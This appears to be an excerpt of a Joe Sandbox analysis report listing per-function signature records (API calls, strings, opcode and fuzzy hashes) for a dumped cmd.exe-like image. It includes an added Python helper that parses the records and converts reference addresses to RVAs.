• Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
• Instruction Fuzzy Hash: 18A19432A1874A96EB50AF10E4482BAFFB5FB84B56FE00135DA4E07694EF7CE545C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
• String ID:
• API String ID: 3935429995-0
• Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction ID: f2ca8261b174ac662338fa1610e0c30e40dc7d2390ffe08121f26de93f681725
• Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
• Instruction Fuzzy Hash: C661AB26B08A9686E714AF22A404679FFB4FB89F96FA58534DE4E43790EF3CD401C710
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
• Instruction ID: 41f95c2a4be24c092dec472be3dc1621d56eb026449010c274ca4eff4fc62ccd
• Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
• Instruction Fuzzy Hash: B991D53270868A86EB64AF24D4102FDBAB0FB49F5AFA04135DA4E47794EF3CD544C720
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _get_osfhandlememset$wcschr
• String ID: DPATH
• API String ID: 3260997497-2010427443
• Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
• Instruction ID: 06798f63061c69187b4a835607453dbed025d49a2c74f37c3082bb0d61473308
• Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
• Instruction Fuzzy Hash: 31D1B122A0869A82EB10BF61D80417DABB1FF84FAAFA44235D91D477D4DF3CE901C360
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
• String ID: @P
• API String ID: 1801357106-3670739982
• Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
• Instruction ID: f7b29c4b608db4cfac12de307c00c804469b4331d3ec91af3c99d4e5c2708dda
• Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
• Instruction Fuzzy Hash: B6416032B04A4ADBE710AF60D4443EDBBB4FB89B5AF944231DA1E57A88DF78D504C760
Uniqueness
Uniqueness Score: -1.00%
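The records above are the Joe Sandbox IDA plugin's per-function signature blocks for the image dumped at Offset 00007FF789BC0000 in process 4. The strings in them (COPYCMD, DPATH, the default PATHEXT list .COM;.EXE;.BAT;...) are characteristic of cmd.exe, consistent with the report's "Drops or copies cmd.exe with a different name" signature. Every "ref:" is a virtual address in that dump, so to find the same call site in the extracted PE in a disassembler you subtract the dump Offset to get an RVA. The Python below is an added example and is not part of the report or of Joe Sandbox: it parses records of this shape into dicts and rebases each API reference to an RVA. The sample input is an excerpt of two records from this page with the "Download File" link residue removed; the dict keys and function names are this example's own choices, not a Joe Sandbox schema.

```python
"""Parse Joe Sandbox per-function 'Similarity' records (API list, Memory Dump
Source, Opcode/Instruction IDs, fuzzy hashes) into dicts and rebase the API
'ref:' addresses to RVAs of the dumped image.
Added example, not part of the Joe Sandbox report. The dict layout ('apis',
'fields', 'image_base', ...) is this example's own assumption, not a Joe Sandbox schema."""
import re
from typing import Dict, List, Tuple

# Sample input: an excerpt of two records from this report page (the
# 'Download File' link residue removed), cut down to the lines that matter.
SAMPLE = """\
APIs
• longjmp.MSVCRT(?,?,00000000,00007FF789BE048E), ref: 00007FF789BEDA58
• memset.MSVCRT ref: 00007FF789BEDAD6
  • Part of subcall function 00007FF789BD3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BEEAC5), ref: 00007FF789BD3A56
• ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BEE204
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
• String ID: %9d$%s$~
• API String ID: 3651208239-912394897
• Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
• Instruction Fuzzy Hash: ED429331A086CA86EB64BF21D8541FDBBB4FB85B4AFA00135E64D47A99DF3DE540C720
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
Similarity
• API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
• String ID: COPYCMD$\\
• API String ID: 3989487059-1802776761
• Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
• Instruction Fuzzy Hash: B7F1C165B0878E82EA64BF15D4042BEABB4FF45F9AFA48035DA4E47794EE3CE045C310
Uniqueness
Uniqueness Score: -1.00%
"""

# One API reference line: '• Name.Module(args), ref: <VA>' or the indented
# '• Part of subcall function <VA>: Name.Module ref: <VA>' form.
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>\S+?)\.(?P<module>[\w\-]+)(?:\([^)]*\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # '• Key: value'
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


def _new_record() -> Dict:
    return {"apis": [], "associated": [], "fields": {}, "source_file": None, "image_base": None}


def parse_records(text: str) -> List[Dict]:
    """Split the dump into records; each record ends at its 'Uniqueness Score' line."""
    records, cur = [], _new_record()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "ref": int(m["ref"], 16), "subcall": m["sub"]})
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m["key"].strip(), m["val"].strip()
            if key == "Associated":
                cur["associated"].append(val)
            elif key == "Source File":  # '<dump>.sdmp, Offset: <base>, based on PE: true'
                cur["source_file"] = val.split(",", 1)[0]
                off = OFFSET_RE.search(val)
                cur["image_base"] = int(off.group(1), 16) if off else None
            else:
                cur["fields"][key] = val
            continue
        if line.strip().startswith("Uniqueness Score:"):
            cur["fields"]["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = _new_record()
    if cur["apis"] or cur["fields"]:  # page cut off before the last record's score
        records.append(cur)
    return records


def api_rvas(record: Dict) -> List[Tuple[str, str, int]]:
    """(api, module, RVA) per ref; RVA = ref VA - dump Offset, valid at any load base."""
    base = record["image_base"]
    return [(a["name"], a["module"], a["ref"] - base) for a in record["apis"]]


def apis_by_module(records: List[Dict]) -> Dict[str, set]:
    """Module -> API names referenced across all records (quick import-style triage)."""
    out: Dict[str, set] = {}
    for r in records:
        for a in r["apis"]:
            out.setdefault(a["module"], set()).add(a["name"])
    return out
```

Usage: `parse_records(SAMPLE)` returns two dicts; `api_rvas(...)` on the first gives `("longjmp", "MSVCRT", 0x2DA58)` for the first reference, which is the offset to look up in the PE extracted from the 00007FF789BC0000 dump. The same parser runs over the full report text once the per-line indentation is stripped, since the regexes tolerate leading whitespace.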

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$BufferConsoleInfoScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1034426908-0
                                                                                                                    • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction ID: b2fa228b6b2128a86568e4075111c73df1b432c6a2fd37bde01896a7301dc641
                                                                                                                    • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                                    • Instruction Fuzzy Hash: E7F1A43270878A8AEB64EF21D8502E9BBB4FF85B99FA04135DA4E47695DF3CE504C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseValue$CreateDeleteOpen
                                                                                                                    • String ID: %s=%s$\Shell\Open\Command
                                                                                                                    • API String ID: 4081037667-3301834661
                                                                                                                    • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                    • Instruction ID: 121c8e268fca8e50b266730986fb1635ff02259c133aa7864f4514d69926bac3
                                                                                                                    • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                                    • Instruction Fuzzy Hash: F071C122B0974A82EA60AF55E4502BDEAB9FF85F96FE48131DA4E07784DF3CD441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAA85
                                                                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAACF
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAAEC
                                                                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB39
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB6F
                                                                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABA4
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABCB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                                                                    • String ID: %s=%s
                                                                                                                    • API String ID: 1019019434-1087296587
                                                                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction ID: 7cc0154377eafed44a3019c82537d3ea085a5c8921ade8505735a0b2bfc440cc
                                                                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction Fuzzy Hash: 04518131B0874A86E760AF65E44476EBEB9FB89F92FA08234CA4D43790DF38D441CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpwcsrchr
                                                                                                                    • String ID: COPYCMD
                                                                                                                    • API String ID: 2429825313-3727491224
                                                                                                                    • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                    • Instruction ID: ce41d2de817a5ce635b628666eee15c85ffdaadbce31804d9a89804a140a32d0
                                                                                                                    • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                                                    • Instruction Fuzzy Hash: ACF1B432F0C64A86FB60AF5191441BDBAB5BB04FAAFA04235DE5E236C4DE3CA541C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4289998964-0
                                                                                                                    • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction ID: aae943abb93caee7bf7d8eb2a6b25fe7be53a474d6a214296b4737bba2217297
                                                                                                                    • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction Fuzzy Hash: CEC19011A0935E82EA94BF91954837DBBB5FF45FA6FA05531CE0E077D0EE3CA491C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3476366620-0
                                                                                                                    • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                    • Instruction ID: ca4034b9830f5a3bed48918525d36d379520abc757b2d9067776673f982ca57f
                                                                                                                    • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                    • Instruction Fuzzy Hash: 67213C20D0964B86FA547F21E8192B8EE71FF86F57FE48235D45E422E1DF3CA405C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                    • String ID: %9d
                                                                                                                    • API String ID: 1006866328-2241623522
                                                                                                                    • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                    • Instruction ID: ff1cb26be9dfd7d6c3e2b6697b67d890d35001970e17c30d7042b4fc8f0534cb
                                                                                                                    • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                    • Instruction Fuzzy Hash: DA516F72A082468BE740EF21D8541A8BBB4FB44B69FA04635DA2D537D5CF3DE500CB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
• Instruction ID: d4bb1f73b970612e71358c105fbf0c62a92b2d2e6c9fa73d68f0c92f9d912026
• Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
• Instruction Fuzzy Hash: 1EC10722A0978A86EB60EF21E854AF9ABB0FF95F59FA44535DA0D47790DF3CD140C320
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
• Instruction ID: 741c4b9477a0c0ae840ae0d00e3d9c25a96c10fa7f684a2926ed59a64a68ac2f
• Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
• Instruction Fuzzy Hash: 33A1C321A0869A82FB54BF25A45567AEAB0FF88F96FE04135DD4E83791DE3DE401C720
